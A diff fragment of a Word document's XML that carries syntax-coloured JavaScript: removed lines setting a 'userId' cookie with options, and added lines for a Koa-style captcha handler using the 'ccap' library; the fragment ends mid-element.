-                <w:b w:val="0"/>
-                <w:color w:val="DCDCAA"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>set</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="CE9178"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>'userId'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="9CDCFE"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>user</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="9CDCFE"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>id</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>, {</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -13104,26 +14903,32 @@
               <w:shd w:val="clear" w:fill="1E1E1E"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
               <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                 <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>                </w:t>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>var</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13136,33 +14941,20 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>httpOnly:</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="569CD6"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>false</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>,</w:t>
+              <w:t>cache</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = {};</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13186,19 +14978,6 @@
               <w:rPr>
                 <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                 <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>                </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
                 <w:color w:val="9CDCFE"/>
                 <w:kern w:val="0"/>
                 <w:sz w:val="21"/>
@@ -13206,20 +14985,150 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>sameSite:</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="CE9178"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>'strict'</w:t>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>async</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>function</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>ctx</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>next</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>) {</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13232,21 +15141,1805 @@
               <w:spacing w:line="285" w:lineRule="atLeast"/>
               <w:jc w:val="left"/>
               <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>var</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>ccap</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>require</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'ccap'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>var</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>capt</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>ccap</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>var</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>capt</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>get</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
